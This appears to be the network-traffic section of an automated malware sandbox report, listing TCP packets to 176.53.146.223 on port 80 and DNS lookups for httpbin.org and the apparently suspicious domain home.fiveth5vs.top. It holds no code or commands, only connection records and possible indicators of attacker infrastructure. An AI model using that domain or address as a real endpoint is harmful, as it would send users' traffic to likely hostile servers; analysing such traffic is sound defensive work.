                                Dec 31, 2024 09:51:13.378875017 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.378952980 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.426918030 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.427056074 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.474919081 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.476962090 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.522928953 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.524956942 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.570883989 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.571751118 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.622941017 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.624994040 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.670965910 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.672955036 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.719043016 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.719171047 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.766887903 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.767030001 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.795855999 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.796127081 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.796232939 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.801145077 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.801198959 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.801255941 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.801306963 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.801367044 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.801378965 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.801409006 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.801431894 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.801497936 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.801507950 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.801517963 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.801553965 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.801574945 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.801580906 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.801589966 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.801598072 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.801608086 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.801615953 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.801632881 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.801641941 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.801690102 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.801697969 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.801713943 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.801723003 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.801743984 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.801753044 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.801815033 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.801822901 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.801851034 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.801867962 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.801923037 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.801933050 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.801969051 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.801978111 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.802095890 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.802104950 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.802114010 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.802124023 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.802131891 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.802135944 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.802146912 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.802156925 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.802172899 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.802181005 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.802227974 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.802237988 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.802253008 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.802314997 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.802324057 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.802326918 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.802333117 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.802335978 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.802397966 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.802407980 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.802426100 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.802434921 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.802481890 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.802491903 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.802500010 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.805002928 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.805073023 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.806021929 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.806112051 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.806122065 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.806130886 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.806191921 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.806209087 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.806262016 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.806271076 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.806427002 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.806436062 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.806483984 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.806493044 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.806591034 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.808854103 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.808927059 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.809912920 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.809921980 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810014009 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810029030 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810132980 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810151100 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810240984 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810297966 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810369015 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810384035 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810471058 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810480118 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810503960 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810513020 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810550928 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810559034 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810590029 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810597897 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810651064 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810659885 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810667038 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810673952 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810697079 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810703993 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810784101 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810800076 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810816050 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810883045 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810914040 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.810929060 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811057091 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811065912 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811074018 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811081886 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811108112 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811116934 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811161041 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811177015 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811233044 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811240911 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811345100 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811352968 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811362028 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811372042 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811388016 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811395884 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811410904 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811418056 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811465025 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811472893 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811517954 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811525106 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.811572075 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.813774109 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.813790083 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.813908100 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.813936949 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814136028 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814176083 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814294100 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814301968 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814322948 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814352989 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814410925 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814419031 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814450979 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814459085 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814512014 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814519882 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814548969 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814630985 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814639091 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814682007 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814691067 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814759016 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814766884 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814815044 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814822912 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814853907 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814914942 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814923048 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.814930916 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815036058 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815046072 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815057993 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815064907 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815078974 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815087080 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815125942 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815146923 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815175056 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815190077 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815248013 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815293074 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815331936 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815376997 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815387011 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815419912 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815473080 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815480947 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815522909 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815531015 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815566063 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815603018 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815653086 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.815665007 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.834889889 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.834980011 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.839847088 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.839898109 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.839941978 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.839982033 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840118885 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840128899 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840176105 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840199947 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840300083 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840308905 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840328932 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840337038 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840389013 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840398073 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840423107 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840431929 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840473890 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840483904 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840503931 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840512037 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840532064 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840539932 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840610981 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840619087 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840626955 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840636015 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840692043 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840699911 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840708017 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840715885 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840732098 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840739965 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840754986 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840768099 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840799093 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840810061 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840812922 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840872049 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840882063 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840893030 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840904951 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840914965 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840929985 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840938091 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840959072 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.840969086 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.841016054 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.841025114 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.841037035 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.841044903 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.841059923 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.841067076 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.841094971 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.843569040 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.848434925 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848457098 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848582029 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848589897 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848634958 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848658085 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848784924 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848793030 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848803043 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848810911 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848826885 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848846912 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848893881 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848903894 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848953009 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848961115 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848974943 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.848983049 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849021912 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849030018 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849071980 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849080086 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849140882 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849148989 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849164963 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849172115 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849181890 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849246025 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849256039 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849263906 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849284887 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849292040 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849340916 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849349976 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849373102 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849380016 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849406958 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849416018 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849457026 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.849464893 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.894916058 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:18.070982933 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:18.071408987 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:18.076380014 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:18.076442003 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:19.296066046 CET4976080192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:19.301042080 CET8049760176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:19.301131964 CET4976080192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:19.301450968 CET4976080192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:19.306386948 CET8049760176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:20.142997980 CET8049760176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:20.143675089 CET4976080192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:20.149157047 CET8049760176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:20.149245977 CET4976080192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:20.471368074 CET4976680192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:20.476190090 CET8049766176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:20.476274967 CET4976680192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:20.476593018 CET4976680192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:20.481359959 CET8049766176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:21.518542051 CET8049766176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:21.519051075 CET4976680192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:21.523968935 CET8049766176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:21.524029970 CET4976680192.168.2.10176.53.146.223

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Dec 31, 2024 09:51:10.109987974 CET5238653192.168.2.101.1.1.1
                                Dec 31, 2024 09:51:10.110043049 CET5238653192.168.2.101.1.1.1
                                Dec 31, 2024 09:51:10.117393970 CET53523861.1.1.1192.168.2.10
                                Dec 31, 2024 09:51:10.117441893 CET53523861.1.1.1192.168.2.10
                                Dec 31, 2024 09:51:12.478568077 CET5238953192.168.2.101.1.1.1
                                Dec 31, 2024 09:51:12.478719950 CET5238953192.168.2.101.1.1.1
                                Dec 31, 2024 09:51:13.263524055 CET53523891.1.1.1192.168.2.10
                                Dec 31, 2024 09:51:13.263552904 CET53523891.1.1.1192.168.2.10
                                Dec 31, 2024 09:51:18.190182924 CET5239153192.168.2.101.1.1.1
                                Dec 31, 2024 09:51:18.190182924 CET5239153192.168.2.101.1.1.1
                                Dec 31, 2024 09:51:18.419943094 CET53523911.1.1.1192.168.2.10
                                Dec 31, 2024 09:51:19.295010090 CET53523911.1.1.1192.168.2.10
                                Dec 31, 2024 09:51:20.204910994 CET5239353192.168.2.101.1.1.1
                                Dec 31, 2024 09:51:20.204988003 CET5239353192.168.2.101.1.1.1
                                Dec 31, 2024 09:51:20.434623957 CET53523931.1.1.1192.168.2.10
                                Dec 31, 2024 09:51:20.470405102 CET53523931.1.1.1192.168.2.10

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Dec 31, 2024 09:51:10.109987974 CET192.168.2.101.1.1.10xcdb9Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                Dec 31, 2024 09:51:10.110043049 CET192.168.2.101.1.1.10x24b5Standard query (0)httpbin.org28IN (0x0001)false
                                Dec 31, 2024 09:51:12.478568077 CET192.168.2.101.1.1.10xcfbdStandard query (0)home.fiveth5vs.topA (IP address)IN (0x0001)false
                                Dec 31, 2024 09:51:12.478719950 CET192.168.2.101.1.1.10x4a8bStandard query (0)home.fiveth5vs.top28IN (0x0001)false
                                Dec 31, 2024 09:51:18.190182924 CET192.168.2.101.1.1.10x255fStandard query (0)home.fiveth5vs.topA (IP address)IN (0x0001)false
                                Dec 31, 2024 09:51:18.190182924 CET192.168.2.101.1.1.10x3ee2Standard query (0)home.fiveth5vs.top28IN (0x0001)false
                                Dec 31, 2024 09:51:20.204910994 CET192.168.2.101.1.1.10x2f7cStandard query (0)home.fiveth5vs.topA (IP address)IN (0x0001)false
                                Dec 31, 2024 09:51:20.204988003 CET192.168.2.101.1.1.10xc93Standard query (0)home.fiveth5vs.top28IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Dec 31, 2024 09:51:10.117393970 CET1.1.1.1192.168.2.100xcdb9No error (0)httpbin.org34.200.57.114A (IP address)IN (0x0001)false
